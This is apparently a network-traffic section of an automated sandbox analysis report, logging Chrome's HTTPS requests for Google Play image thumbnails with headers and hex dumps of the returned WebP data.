                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: a1 eb d9 68 65 53 0f 4c c3 8d 2f f5 6f 2d b3 2c ed 4f ba 66 f3 de b5 22 e2 a7 47 bb cd f6 1d 90 95 b9 fd 0d 00 b8 7b f7 ee 58 85 b1 c8 77 d6 f9 1b 77 1a fb 1b 3e ee 77 76 b2 fc bc 1f fe fc e7 7c e7 c7 ab db 87 df ad 84 db d5 d6 47 45 4d 15 04 5c ab 8d 92 82 e6 50 56 89 04 d4 1c 64 11 80 82 17 e9 f9 00 af 4b 8a e2 e4 27 a6 e3 46 de 6b 77 42 db b7 9e d8 34 b6 55 d9 fa 81 f3 ea 94 7f 5e 67 02 1f 4f 0f e0 11 7d d8 fd bf 95 6f 70 7d 75 cc 42 73 77 e7 e3 c5 97 ee be c2 bb 7f 0c 9f fe 1a f0 e1 eb f7 5f 3b bf 62 07 af 7e 14 8e 3f fa 35 af ff cb 58 00 3e b6 5f c2 2e 72 aa 60 d2 c8 00 82 06 7e a0 a8 34 60 50 ac b8 66 84 de ae 5b ce be 30 b2 57 dc 67 d5 4e ff 72 77 71 e7 34 8b c6 ae 52 0a 5a dc a1 29 09 49 50 d2 94 e5 0c 9c aa 2f 2c 76 02 65 54 04 bd 94 83 10 45 d0
                                                                                                                                                                                                                                  Data Ascii: heSL/o-,Of"G{Xww>wv|GEM\PVdK'FkwB4U^gO}op}uBsw_;b~?5X>_.r`~4`Pf[0WgNrwq4RZ)IP/,veTE


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  107192.168.2.649955216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1088OUTGET /GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 536
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 6673
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC536INData Raw: 52 49 46 46 10 02 00 00 57 45 42 50 56 50 38 4c 03 02 00 00 2f 3f c0 0f 00 df e3 36 b6 6d 55 d9 f7 bd 87 bb 53 01 65 58 ff f9 cf a8 80 c8 f5 dd 7b da 70 1b db b6 aa ac ef 9a 91 6b 46 ff 31 15 d0 01 a9 74 e0 7a dc c4 b6 ed 2a e7 fc 1c 3a 24 e4 a8 03 07 88 42 18 3a 18 3a ca 0f d5 0f bc bb e7 3f 14 da f9 0a 56 94 ea b5 43 d1 83 35 0c 86 11 11 f9 53 16 0a f0 07 a4 32 e7 bf 2f 99 00 bf 5d c1 ac c0 4c 0f 66 6c e8 06 39 23 c8 b5 2f 86 5c fc 27 08 ad e5 41 f3 b4 f7 58 30 e6 92 df 2d 17 50 f3 27 98 3c 0a 69 9b b3 c2 28 e4 7c 80 47 fe ff 85 48 9a df 00 97 a4 3e 49 32 a5 28 64 99 4b 03 17 02 42 a8 49 14 08 44 ac b0 2a 09 d0 67 2d 17 99 c2 6e 19 39 28 16 20 f8 e6 cf c1 e1 73 4a 3e 01 05 fc 8f a7 90 13 14 54 10 21 22 72 13 5e 09 41 96 8b 27 23 82 34 0d 00 2b f0 49 10
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/?6mUSeX{pkF1tz*:$B::?VC5S2/]Lfl9#/\'AX0-P'<i(|GH>I2(dKBID*g-n9( sJ>T!"r^A'#4+I


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  108192.168.2.649954216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1093OUTGET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 39178
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:39:33 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:39:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 853
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC857INData Raw: 52 49 46 46 02 99 00 00 57 45 42 50 56 50 38 4c f6 98 00 00 2f 9f 81 32 10 4d 40 72 db 48 92 24 db 31 6b 44 fd ff c1 19 dd a8 59 cf 11 fd 9f 00 fd 3f b3 bc bf 2f 1e 45 ef 9d 3e 7c 1f 6b 54 75 48 0a 76 ba 6d bb 5b be 23 ec 2e a8 3a a6 db 76 77 d7 74 6b 6e a8 e8 90 64 83 97 73 fc 50 77 c6 00 23 49 9c 9b cf ee 6e cf 2c d6 c7 13 31 45 92 43 b5 d9 ee 9e b6 ed 39 22 b7 a9 27 00 23 6d 6f 85 96 e9 ee c5 76 c9 63 59 79 14 76 e9 5d 79 7b f0 c5 06 30 90 48 79 9b f7 2a be e6 0a d8 66 4d 1a a9 df 5f e7 6b 12 1f 40 b7 a4 58 2d f5 f8 6b 38 c7 91 dd 02 a2 9a 1e f8 92 16 30 53 91 88 40 52 2b 50 fe 8a a4 48 52 00 36 92 08 0e 7c 45 bb b2 1e 88 11 62 ed 2f 30 70 b0 8b 90 e7 ea 16 1e d4 91 00 49 83 0b a4 19 95 ef 30 d8 01 3b 22 85 b2 b9 4a 9a 96 6f 01 1c 80 44 49 55 05 5a ea
                                                                                                                                                                                                                                  Data Ascii: RIFFWEBPVP8L/2M@rH$1kDY?/E>|kTuHvm[#.:vwtkndsPw#In,1EC9"'#movcYyv]y{0Hy*fM_k@X-k80S@R+PHR6|Eb/0pI0;"JoDIUZ
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: a3 59 e6 36 8c 8c 59 1a 1e e6 ff 97 db 91 63 cf 75 96 d1 13 6f 98 99 99 99 99 99 99 99 99 99 99 99 93 65 66 66 66 1e 08 33 2f a3 a7 78 df 73 ce 7b ce bd 7b 5e 57 c9 27 15 3a 8b 95 75 a4 91 ab f0 82 5d 85 17 ab a9 3c 45 78 bc e0 89 34 5a 0e 5a e1 64 19 ad 5b 58 a1 a9 c6 55 b0 1a 57 21 eb 14 d6 32 c3 1b 5c e6 ad e6 2d ac 25 57 4b 56 98 ac c5 2a 64 2d 56 b3 57 ba 5a a6 59 87 39 19 2d 56 a3 2b 59 5b 85 46 61 5a 72 52 2d 9f c2 53 2d 8d 16 de a9 96 5d 85 46 ff c2 53 85 46 0b 57 8b d5 b8 0a b9 f2 56 68 2d 5c 85 69 a6 5a 9a 6a b4 58 f9 16 5e 37 c1 71 15 72 e5 2c b9 9a 53 58 8b d5 c8 d2 91 ab 65 74 b5 64 05 ab 95 25 cb 55 78 c9 55 c8 0a d3 e8 16 de 6a 3a 37 53 85 ac 30 df 80 ab b0 ab 25 57 9e 2a 34 3a 52 3c 55 d8 c5 d5 62 35 ae c2 34 5a ac d6 c5 0d 4e 35 61 a6 d1
                                                                                                                                                                                                                                  Data Ascii: Y6Ycuoefff3/xs{{^W':u]<Ex4ZZd[XUW!2\-%WKV*d-VWZY9-V+Y[FaZrR-S-]FSFWVh-\iZjX^7qr,SXetd%UxUj:7S0%W*4:R<Ub54ZN5a
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 03 80 4c 12 c7 11 87 d9 59 44 f0 f4 12 2d 9e 72 cc 9c 43 af f1 44 fc 74 f4 60 81 2c 9a 06 18 29 12 b5 8d 0c 3b 63 1d 6c 80 6d 59 20 39 47 8f 97 0c 9c 44 d2 6e 6e 9d 7d 3e dd dc 37 60 71 22 7c 04 0d 13 25 97 48 d0 74 4d 37 24 5c f9 01 c0 ea 2b f4 13 f4 e5 25 ba 41 30 a1 78 82 95 1a 97 84 5d 0e 31 38 7d 5b 58 9d db c5 1d 60 8c c0 a8 7b 3a 88 8f 90 44 1e de 3b c2 c0 c4 a5 2a cd 91 c7 39 7a b3 6c 4a 19 44 9e a3 da 01 a8 9f cf 15 89 60 4b 72 af c3 b5 1f b5 64 31 f4 e8 5d 4f e2 da c3 2c 80 44 74 bd 2a 24 6c ed bb 36 6c d8 c3 4d 47 b4 9e bd 0e 62 03 4e 06 78 72 ca 90 45 5c 31 26 b7 a1 3b 09 63 08 be 69 b8 b8 4d 5c 07 90 bf 46 5c 00 4e 1b 59 12 69 88 ca 43 c5 45 81 04 08 37 5e 50 82 13 4f 5b 02 56 c5 fd 46 23 63 74 22 90 19 b3 b4 9a dd b0 a1 71 4e 90 f0 cf ce 6a
                                                                                                                                                                                                                                  Data Ascii: LYD-rCDt`,);clmY 9GDnn}>7`q"|%HtM7$\+%A0x]18}[X`{:D;*9zlJD`Krd1]O,Dt*$l6lMGbNxrE\1&;ciM\F\NYiCE7^PO[VF#ct"qNj
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: be 70 ed 81 76 8e eb 20 a8 6d 2b 9b 55 c5 6c 36 87 b4 05 a4 33 a8 f7 15 0b 73 1a ec 1a 02 7f b7 e7 38 d1 86 0f 30 3a f9 12 51 c1 b6 32 49 26 2a 78 5b 60 4d 54 a5 06 05 44 f9 ee 9b 6d b8 6d bb ed 85 3b 87 2c 9d ae 70 01 4f f0 ee 02 2f f0 82 52 43 cc 65 d1 04 bb f0 76 b2 5b 72 79 9c d1 6a b5 f6 8a 12 dc f6 f6 d4 83 a1 d6 ea 6e 1a 12 69 ab 67 8a 7f 3e 0d 00 f3 05 12 ef 4e 08 bd 0e f0 38 c4 45 0f 67 01 9e 76 41 92 99 15 81 2a 98 7f e9 f8 c9 12 62 b1 1b 1f 12 a0 ea d9 e1 02 b1 cb 6b 06 94 9a 1f d4 bb 05 40 d1 2d fd f3 85 e0 e2 51 fc aa 00 df b3 6f 64 8b dc 08 2e 0d c1 2f 03 d4 42 6c 68 d8 e0 92 31 f1 66 3d b8 d3 9f 25 60 bc 39 ed 1b a7 83 81 40 93 6a ac b1 6c 67 78 b3 1c 7b 82 c6 5e 55 60 bb 19 cc 75 53 59 b8 46 d4 3f dd 1e 38 05 51 ea 3d e9 3e b8 67 56 90 c5
                                                                                                                                                                                                                                  Data Ascii: pv m+Ul63s80:Q2I&*x[`MTDmm;,pO/RCev[ryjnig>N8EgvA*bk@-Qod./Blh1f=%`9@jlgx{^U`uSYF?8Q=>gV
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: dd 95 3e 03 c8 8c 37 fb ee 52 68 f6 89 4f 39 f0 16 66 e2 8a c3 e4 d9 fa 8c 4e ed a9 b3 50 a6 95 0a b8 38 d1 b3 44 ce 38 ad a2 5c 1e c7 b0 82 a2 b6 d6 0a 15 fc 73 b3 9e e5 80 f4 12 64 39 5b 2e 4e 74 a7 ea f4 b1 3c a1 c5 2b 39 49 e2 4f 69 00 58 dc 9a e1 90 ad 0c 04 99 a8 01 82 89 14 50 3c 6a 71 e4 80 02 55 70 28 d1 b9 4f 6c 77 a7 f5 36 62 3b 21 5a 31 c1 77 1a b0 82 45 d5 a3 bb 7d a3 2c c9 e9 61 ab 40 7b bf d0 7e b0 a4 e4 31 81 0e c1 80 68 8f e4 69 31 dd 02 b4 56 01 26 84 4d ee 7b 35 f0 65 c1 92 c3 18 90 35 c4 a2 b2 f7 fe c3 4c bf e3 10 20 6a 3b c7 4f d1 58 33 76 49 66 27 24 de 4c 6a 28 8b 0b f0 fc 25 5f 8e 52 4f 4a 34 d2 42 83 b9 7a a1 f8 ba 1a bc 73 6a 7b 8b 3a 68 69 d1 fe 03 67 9d 4d 96 5a 48 59 45 43 c4 43 21 55 2b 59 01 3c 28 47 e2 5d 07 b7 70 5b d0 25
                                                                                                                                                                                                                                  Data Ascii: >7RhO9fNP8D8\sd9[.Nt<+9IOiXP<jqUp(Olw6b;!Z1wE},a@{~1hi1V&M{5e5L j;OX3vIf'$Lj(%_ROJ4Bzsj{:higMZHYECC!U+Y<(G]p[%
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: ba 28 a4 c1 ca 03 c3 e3 f4 af 34 14 4e 76 69 7a f1 ef dc f3 4b da 8e d9 56 72 7c 7c f2 98 11 95 ec a3 f5 c6 b6 43 b3 60 9c 4b 1a 6b 19 e3 55 4e 58 ff 64 ad da 9d 9c 68 2f fc f5 31 57 3d eb 62 13 ce 2f f0 c5 ee 3f 9c 9f e1 ae 7a 0c 4e 17 a8 e0 a0 ba 55 27 11 38 29 4f b8 2a e0 d1 4a dd 9e 28 cb 00 eb 0d 90 ad be a3 9a 65 6d 0d 57 68 38 c3 51 6b 81 d1 db bb 58 31 fb 85 f3 0e 34 1f d6 0f dd 5e e7 d3 67 72 a2 8a 5c 2e 3f 7b 7f 07 29 9a e5 cc 40 7f 28 f6 7e 69 06 e4 8e db 66 ca ec 07 7c 9a 7d a7 26 11 d1 19 c2 9e 78 6b c2 09 27 7c 74 5f e4 7c b1 7b 44 da ae 0a 1a bc 37 48 2e 99 42 8d 3a d5 56 3a e7 02 f5 7f db 4d a9 35 88 f2 0e b7 d2 06 1c d0 e8 e2 d0 62 f9 eb f2 1f 16 c6 52 0e c7 2f 6a 70 4f 4c a9 22 1b 80 a8 7d 37 dd ca 23 4c 61 4e 25 af 68 e1 1e 63 28 f2 78
                                                                                                                                                                                                                                  Data Ascii: (4NvizKVr||C`KkUNXdh/1W=b/?zNU'8)O*J(emWh8QkX14^gr\.?{)@(~if|}&xk'|t_|{D7H.B:V:M5bR/jpOL"}7#LaN%hc(x
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 5a 88 66 56 b8 5b 18 95 2c f0 d7 75 4f 84 5f e4 35 22 ba 19 19 58 05 00 0a 51 a3 a7 a5 5b c2 db 3e de c5 44 87 57 43 10 34 32 ed 3f a4 35 1e af 0a 36 be f0 0b 7b 6e 40 e0 39 63 ad 5a c7 3a 56 bc d4 fa c6 b8 c7 a4 77 da 96 50 6f 2e 5c ef 0d e7 f3 7d 9d 93 e2 c2 36 47 7c 20 6b 80 a1 59 c7 8a 86 37 f7 b2 4b 86 a6 6d 6d cc 92 d0 ce dd 22 e3 99 a2 f2 d0 51 32 dc 68 f9 2c 60 50 67 24 c8 1d 20 82 0b 65 6d 36 87 9c bb 76 ed 57 73 3a 22 6b e4 ec c1 94 ff 78 b7 be 3e 6f aa 62 a7 8f 6e 0c 53 31 0f 9b 3e c8 55 a9 d0 e4 c3 fc 1e ef 93 cd 27 da 00 66 41 aa d6 f0 e1 e8 e9 fe a8 1f 18 b5 c5 8a f1 bc 52 e0 20 93 19 d3 7c 00 a3 1c df a9 82 9f 00 bf 58 06 cf 34 69 32 d7 3a eb b1 5c c6 c1 fe 42 73 87 dd a7 bf 11 2f 5c 0b 83 52 db cd a6 f7 73 32 2b e5 08 37 1c 95 24 8e 58 4d
                                                                                                                                                                                                                                  Data Ascii: ZfV[,uO_5"XQ[>DWC42?56{n@9cZ:VwPo.\}6G| kY7Kmm"Q2h,`Pg$ em6vWs:"kx>obnS1>U'fAR |X4i2:\Bs/\Rs2+7$XM
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 63 00 e0 6e a7 f0 d0 51 32 f8 81 ab 74 07 06 f0 87 d0 58 a0 1c 11 32 59 9e 1c 69 be 03 0e 0a fe 4e bf 65 43 ab 31 d7 9d 42 2e 97 c7 58 11 2d 92 22 de 1b 79 bc 6c 21 96 1f 00 d4 af 29 89 0a 2d 6c 12 5d d2 93 fa 8b f6 dc f5 a7 dd e6 dc f1 1d 1f 7f 5f 73 d0 e9 ab 4f 2f de ab 58 b1 62 bc ef fa 1b 96 73 83 19 76 25 b4 12 ce 01 3e 41 09 1d 11 96 bf b4 69 b7 7a 1b e3 5a e1 45 da 0c 3e 9f 01 88 bd 02 27 29 66 53 2c b6 22 49 ff 90 5a 50 25 67 24 b9 27 cc 30 01 ab c1 52 0d 33 73 c8 08 1d 34 1b 50 d0 e1 91 89 c2 c2 5d 4e 18 66 76 b0 e6 a7 8f 49 49 10 e4 f0 98 30 b9 a2 c5 4a 80 0e 9f bc b2 5f 32 bf 12 27 59 6c d6 f8 76 71 2b 69 96 db 2d ad d6 6e a7 d5 6a ed 65 1f 87 73 67 87 20 cd ee e3 4a 5b 4f c8 b7 00 66 e9 87 15 ac de 8b 14 74 7b 64 2d 76 ab cf 9e 4d ca da e5 7a
                                                                                                                                                                                                                                  Data Ascii: cnQ2tX2YiNeC1B.X-"yl!)-l]_sO/Xbsv%>AizZE>')fS,"IZP%g$'0R3s4P]NfvII0J_2'Ylvq+i-njesg J[Oft{d-vMz
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: ee 51 87 65 9c 39 c3 59 0f 14 a2 3b c2 04 00 27 a7 ae 78 99 a7 f6 a1 29 4f 14 2b 0e aa 55 f8 a4 87 98 51 47 2d 9a 30 44 69 d7 2c e4 44 4f 44 e4 53 b6 6a 5f b7 bf cc 64 7f 48 c3 89 81 56 ab 85 4c b2 a9 65 82 82 57 70 87 be 12 7f 58 f3 40 f5 ae df db 1a 6e 7c 9f d5 ae cb cd c9 ac c0 06 b4 60 fc ac cf 62 84 f0 9c 6c c9 04 99 9e 75 b7 5b f4 82 20 e8 05 04 a6 70 f8 e1 66 be 87 19 c4 72 59 77 b1 62 71 80 5e a3 90 e6 ef 37 0f ac 58 05 a0 4c 7e 20 2b 40 62 97 05 1d c0 61 ae 1c 40 a7 58 5d 58 4b 98 43 0c d2 16 b3 03 34 9e 02 66 05 ae a2 9b 43 03 3a eb 23 9a a1 56 14 dd bd 2f 26 cf 06 4d c8 74 fd 93 3f 09 64 8d a8 37 33 98 78 90 af 89 49 bd 88 a1 21 0a 16 64 56 4a 6e 8e 9f 63 6e e2 9d 90 58 e9 15 4a 8e 53 d6 9d 02 0b d1 d4 54 e1 24 b0 59 f6 86 bb 6b 45 e9 b3 e2 02
                                                                                                                                                                                                                                  Data Ascii: Qe9Y;'x)O+UQG-0Di,DODSj_dHVLeWpX@n|`blu[ pfrYwbq^7XL~ +@ba@X]XKC4fC:#V/&Mt?d73xI!dVJncnXJST$YkE
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: eb f8 62 73 63 c6 4b 1e 8c 0a 44 34 aa 5a 13 75 76 39 2b 2f e0 79 fa b1 82 12 e5 39 e9 68 82 65 70 2e 22 72 1a 08 18 d0 60 30 1b ea da c5 6c e6 e5 b6 1a 5a 8e 15 32 2d d1 7e 41 54 79 0b 4a b0 22 44 df 87 10 a1 a2 db cb d6 b3 8d 3a dd e9 66 eb 70 d1 97 5a c9 00 37 4b 4b 5b 3d f7 58 17 7d 3f 8b 20 9e d0 fa 54 e7 4c 02 58 95 94 7e 51 bf ac 2a c9 5b ef ac 78 27 b6 12 05 24 8b f8 fc 33 b3 a8 ae 50 7a 34 68 fc 3d 51 35 59 9e f1 95 a3 1d ca ea 21 14 42 50 b0 e2 0e 53 fe a4 05 ea 80 55 b1 c5 b6 ba 44 95 a6 1f 8e ef f2 d5 90 77 d3 6c 73 fd 81 a1 01 10 09 2d 0a 16 3b 32 da 09 a8 d8 5b 52 de 26 01 a0 bf 07 3d 7b c1 23 ce 93 13 a7 ae 30 f5 36 2b da 05 95 be e6 e3 a7 41 48 e5 2b a0 cf a1 14 d3 61 be 54 47 30 9b 5e 20 f1 0e ab ab aa 54 95 c6 78 1f 18 fa d1 1e cd 50 b7
                                                                                                                                                                                                                                  Data Ascii: bscKD4Zuv9+/y9hep."r`0lZ2-~ATyJ"D:fpZ7KK[=X}? TLX~Q*[x'$3Pz4h=Q5Y!BPSUDwls-;2[R&={#06+AH+aTG0^ TxP


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  109192.168.2.649951216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1087OUTGET /G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 686
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:10:43 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:10:43 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 6183
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
